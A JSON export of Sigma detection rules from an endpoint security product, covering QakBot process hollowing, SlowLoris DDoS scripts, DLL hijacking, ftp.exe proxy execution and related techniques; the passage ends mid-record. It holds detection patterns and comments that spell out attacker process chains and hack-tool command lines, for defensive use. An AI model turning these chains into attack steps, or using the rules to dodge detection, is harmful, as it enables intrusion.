"rule_description": "Detects a suspicious execution from a mounted device.\nIt is often the result of a spearphishing attack via a disk image file (such as ISO or IMG) containing a malicious link.\nAttackers may abuse it to gain execution and avoid detection.\nIt is recommended to check the executed binary for malicious behavior or content.\n",
"rule_creation_date": "2022-02-14",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1204",
"attack.t1218",
"attack.t1553.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c6f424db-75c0-4673-be22-9ec4078db0a1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077979Z",
"creation_date": "2026-03-23T11:45:34.077981Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077985Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
"https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
"https://binarydefense.com/qakbot-upgrades-to-stealthier-persistence-method/",
"https://www.elastic.co/fr/security-labs/qbot-malware-analysis",
"https://attack.mitre.org/techniques/T1055/012/"
],
"name": "t1055_012_quakbot_process_injection.yml",
"content": "title: Process Tampering Linked to QakBot Malware\nid: c6f424db-75c0-4673-be22-9ec4078db0a1\ndescription: |\n Detects a process injection technique called process hollowing, typically used by the QakBot malware.\n Attackers may inject malicious code into suspended and hollowed processes to evade detection.\n Process hollowing is a method of executing malicious code in the address space of a separate legitimate process.\n It is recommended to analyze both the parent and child processes to look for malicious content, and to investigate further suspicious activities on the host.\nreferences:\n - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\n - https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\n - https://binarydefense.com/qakbot-upgrades-to-stealthier-persistence-method/\n - https://www.elastic.co/fr/security-labs/qbot-malware-analysis\n - https://attack.mitre.org/techniques/T1055/012/\ndate: 2022/04/08\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.Qakbot\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # Seen in March 2022 campaign :\n # C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE /dde --> regsvr32 C:\\Seng\\exle1.dll --> C:\\Windows\\SysWOW64\\OneDriveSetup.exe\n\n # Seen in April 2022 campaign :\n # C:\\Windows\\syswow64\\MsiExec.exe -Embedding 9B29D099C2FA9FBA0F9F92B45B8B5BB5 --> C:\\Windows\\SysWOW64\\regsvr32.exe C:\\Users\\xxx\\AppData\\Local\\SetupTest\\2.dll --> C:\\Windows\\SysWOW64\\OneDriveSetup.exe\n\n # Seen in July 2022 campaign :\n # ISO --> LNK --> C:\\Windows\\System32\\cmd.exe /q /c calc.exe (Dll Sideloading) --> C:\\Windows\\SysWOW64\\regsvr32.exe 7533.dll --> C:\\Windows\\SysWOW64\\wermgr.exe\n\n # Seen in November 2022 campaign :\n # https://twitter.com/pr0xylife/status/1592228104139067392\n # ISO --> LNK --> C:\\Windows\\System32\\cmd.exe /c control.exe (Dll Sideloading) --> C:\\Windows\\SysWOW64\\regsvr32.exe msoffice32.dll --> C:\\Windows\\SysWOW64\\CertEnrollCtrl.exe\n\n # Seen in December 2023 campaign:\n # https://twitter.com/CyberGoatherder/status/1736160938212901200\n # MsiExec.exe --> Rundll32.exe --> SearchIndexer.exe\n # https://twitter.com/Max_Mal_/status/1736392741758611607\n # MsiExec.exe --> Rundll32.exe --> wermgr.exe\n CommandLine|endswith:\n - '\\explorer.exe'\n - '\\iexplore.exe'\n - '\\OneDriveSetup.exe'\n - '\\msra.exe'\n - '\\mobsync.exe'\n - '\\wermgr.exe'\n - '\\CertEnrollCtrl.exe'\n - '\\SearchIndexer.exe'\n ParentImage|endswith:\n - '\\rundll32.exe'\n - '\\regsvr32.exe'\n\n # Specific for campaign with malicious document or msiexec\n selection_grandparent:\n GrandparentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\POWERPNT.EXE'\n - '\\msiexec.exe'\n\n # Specific for campaign with ISO --> LNK\n selection_currentdirectory:\n CurrentDirectory: '?:\\'\n\n exclusion_bluefiles:\n ParentCommandLine:\n - 'rundll32.exe ?:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc * BlueFilesSuite!BlueFilesSuite.CustomActions.RestartExplorerForce'\n - 'rundll32.exe ?:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc * BlueFilesSuite!BlueFilesSuite.CustomActions.RestartExplorer'\n\n # https://x.com/SBousseaden/status/1326652574150299649\n exclusion_runas:\n ParentCommandLine: '*RunDll32.exe ?:\\Windows\\System32\\SHELL32.dll,RunAsNewUser_RunDLL Local\\{4ddb9f3f-700c-4bd6-9fc0-eaf85c01d25b}*'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c6f424db-75c0-4673-be22-9ec4078db0a1",
"rule_name": "Process Tampering Linked to QakBot Malware",
"rule_description": "Detects a process injection technique called process hollowing, typically used by the QakBot malware.\nAttackers may inject malicious code into suspended and hollowed processes to evade detection.\nProcess hollowing is a method of executing malicious code in the address space of a separate legitimate process.\nIt is recommended to analyze both the parent and child processes to look for malicious content, and to investigate further suspicious activities on the host.\n",
"rule_creation_date": "2022-04-08",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c701e4c7-e347-4278-a6b5-6caeac92ea57",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613703Z",
"creation_date": "2026-03-23T11:45:34.613706Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613713Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/",
"https://github.com/maxkrivich/SlowLoris",
"https://github.com/StanGirard/SlowLoris-DDOS-Attack",
"https://github.com/0xc0d/Slow-Loris",
"https://github.com/GHubgenius/slowloris.pl",
"https://attack.mitre.org/techniques/T1499/002/"
],
"name": "t1498_slowloris_script_execution_linux.yml",
"content": "title: SlowLoris Script Execution (Linux)\nid: c701e4c7-e347-4278-a6b5-6caeac92ea57\ndescription: |\n Detects suspicious arguments in a command-line linked to the usage of a SlowLoris DDoS script.\n SlowLoris is a type of DDoS attack which allows an attacker to overwhelm a server by maintaining multiple HTTP connections.\n It is recommended to investigate this by checking if the script parameters are aimed at your own infrastructure and that they're not part of an internal test.\nreferences:\n - https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/\n - https://github.com/maxkrivich/SlowLoris\n - https://github.com/StanGirard/SlowLoris-DDOS-Attack\n - https://github.com/0xc0d/Slow-Loris\n - https://github.com/GHubgenius/slowloris.pl\n - https://attack.mitre.org/techniques/T1499/002/\ndate: 2023/09/19\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1499.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.HackTool.SlowLoris\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains:\n - 'slowloris.pl'\n - 'slowloris '\n - 'slowloris.py'\n\n # There is another rule for cloning\n filter_github:\n CommandLine|contains|all:\n - ' clone '\n - 'github'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c701e4c7-e347-4278-a6b5-6caeac92ea57",
"rule_name": "SlowLoris Script Execution (Linux)",
"rule_description": "Detects suspicious arguments in a command-line linked to the usage of a SlowLoris DDoS script.\nSlowLoris is a type of DDoS attack which allows an attacker to overwhelm a server by maintaining multiple HTTP connections.\nIt is recommended to investigate this by checking if the script parameters are aimed at your own infrastructure and that they're not part of an internal test.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2025-01-29",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1499.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c707a3c3-727b-4362-ab7f-c7e38a8e020d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088904Z",
"creation_date": "2026-03-23T11:45:34.088907Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088911Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_locationnotificationwindows.yml",
"content": "title: DLL Hijacking via LocationNotificationWindows.exe\nid: c707a3c3-727b-4362-ab7f-c7e38a8e020d\ndescription: |\n Detects potential Windows DLL Hijacking via LocationNotificationWindows.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LocationNotificationWindows.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\msvcp110_win.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c707a3c3-727b-4362-ab7f-c7e38a8e020d",
"rule_name": "DLL Hijacking via LocationNotificationWindows.exe",
"rule_description": "Detects potential Windows DLL Hijacking via LocationNotificationWindows.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c70add7d-5d2c-4c70-8093-25c9b2c4abc8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595326Z",
"creation_date": "2026-03-23T11:45:34.595329Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595337Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SecurityAura/status/1737092798728278498",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_dll_load_from_programdata.yml",
"content": "title: DLL Loaded from ProgramData Folder\nid: c70add7d-5d2c-4c70-8093-25c9b2c4abc8\ndescription: |\n Detects the loading of a DLL from the root of the ProgramData folder.\n This uncommon location may indicate malicious activity, as attackers often load unauthorized code here.\n It is recommended to analyze the loaded DLL, check its file integrity, and review process permissions to identify potential threats.\nreferences:\n - https://twitter.com/SecurityAura/status/1737092798728278498\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/01/26\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\ProgramData\\'\n\n filter_image:\n ImageLoaded: '?:\\ProgramData\\\\*\\\\*'\n\n exclusion_tencent:\n # C:\\Program Files (x86)\\Tencent\\QQLive\\QQLive.exe\n ProcessOriginalFileName: 'QQLive.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Tencent Technology(Shenzhen) Company Limited'\n ImageLoaded: '?:\\ProgramData\\QLDZModule.dll'\n\n exclusion_bomgar:\n OriginalFileName: 'nstvhook.dll'\n Description: 'Bomgar Support Client Utilities'\n ImageLoaded:\n - '?:\\ProgramData\\Z@S!-????????-????-????-????-????????????.tmp'\n - '?:\\ProgramData\\Z@!-????????-????-????-????-????????????.tmp'\n\n exclusion_quest:\n # C:\\Program Files (x86)\\Quest\\KACE\\Inventory.exe\n ProcessOriginalFileName: 'Inventory.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Quest Software Inc.'\n ImageLoaded: '?:\\ProgramData\\hooking64.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c70add7d-5d2c-4c70-8093-25c9b2c4abc8",
"rule_name": "DLL Loaded from ProgramData Folder",
"rule_description": "Detects the loading of a DLL from the root of the ProgramData folder.\nThis uncommon location may indicate malicious activity, as attackers often load unauthorized code here.\nIt is recommended to analyze the loaded DLL, check its file integrity, and review process permissions to identify potential threats.\n",
"rule_creation_date": "2024-01-26",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c711a697-7c2d-432c-b9ec-5f5135728e32",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079297Z",
"creation_date": "2026-03-23T11:45:34.079299Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079303Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Ftp/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/software/S0095/"
],
"name": "t1218_suspicious_process_ftp.yml",
"content": "title: Suspicious ftp.exe Execution\nid: c711a697-7c2d-432c-b9ec-5f5135728e32\ndescription: |\n Detects a suspicious attempt to execute the legitimate ftp.exe binary in order to proxy the execution of another binary.\n Ftp.exe can be used as a LOLBin in order to execute other malicious binaries and bypass existing application control defenses.\n It is recommended to analyze both the process responsible for the execution of ftp.exe and all processes stemming from ftp.exe for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Ftp/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0095/\ndate: 2021/08/05\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.command_and_control\n - attack.t1105\n - attack.s0095\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.FTP\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_ftp:\n - Image:\n - '?:\\Windows\\System32\\ftp.exe'\n - '?:\\Windows\\SysWOW64\\ftp.exe'\n - OriginalFileName: 'ftp.exe'\n\n selection_proxy:\n CommandLine|contains: ' -s:'\n ParentCommandLine: '*echo*>* -s:*'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c711a697-7c2d-432c-b9ec-5f5135728e32",
"rule_name": "Suspicious ftp.exe Execution",
"rule_description": "Detects a suspicious attempt to execute the legitimate ftp.exe binary in order to proxy the execution of another binary.\nFtp.exe can be used as a LOLBin in order to execute other malicious binaries and bypass existing application control defenses.\nIt is recommended to analyze both the process responsible for the execution of ftp.exe and all processes stemming from ftp.exe for malicious content or actions.\n",
"rule_creation_date": "2021-08-05",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c74354e5-97ed-497f-9053-69bd6dec5b1e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605373Z",
"creation_date": "2026-03-23T11:45:34.605377Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605384Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://parrotsec.org/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_silent_workstation_name_parrot.yml",
"content": "title: Activity linked to Workstation Named Parrot\nid: c74354e5-97ed-497f-9053-69bd6dec5b1e\ndescription: |\n Detects an activity from a machine whose name is Parrot, a widely used penetration testing Linux distribution.\n Attackers may connect external machines to the network to conduct malicious activities.\n It is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\nreferences:\n - https://parrotsec.org/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2020/01/14\nmodified: 2025/06/10\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.Parrot\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n - Workstation: 'parrot'\n - WorkstationName: 'parrot'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c74354e5-97ed-497f-9053-69bd6dec5b1e",
"rule_name": "Activity linked to Workstation Named Parrot",
"rule_description": "Detects an activity from a machine whose name is Parrot, a widely used penetration testing Linux distribution.\nAttackers may connect external machines to the network to conduct malicious activities.\nIt is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\n",
"rule_creation_date": "2020-01-14",
"rule_modified_date": "2025-06-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c7469ee5-54c5-4538-ae5b-64928810d159",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586895Z",
"creation_date": "2026-03-23T11:45:34.586900Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586907Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_resetengine.yml",
"content": "title: DLL Hijacking via resetengine.exe\nid: c7469ee5-54c5-4538-ae5b-64928810d159\ndescription: |\n Detects potential Windows DLL Hijacking via resetengine.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'resetengine.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\Cabinet.dll'\n - '\\DismApi.DLL'\n - '\\FVEAPI.dll'\n - '\\ReAgent.dll'\n - '\\ResetEngine.dll'\n - '\\tbs.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\WDSCORE.dll'\n - '\\WIMGAPI.DLL'\n - '\\WINHTTP.dll'\n - '\\WOFUTIL.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c7469ee5-54c5-4538-ae5b-64928810d159",
"rule_name": "DLL Hijacking via resetengine.exe",
"rule_description": "Detects potential Windows DLL Hijacking via resetengine.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c7773add-97e5-4efe-a11f-e99ba3f36f11",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094056Z",
"creation_date": "2026-03-23T11:45:34.094058Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094063Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/bohops/status/1635288066909966338",
"https://learn.microsoft.com/fr-fr/dotnet/core/diagnostics/dotnet-dump",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_process_memory_dump_via_dotnet_dump.yml",
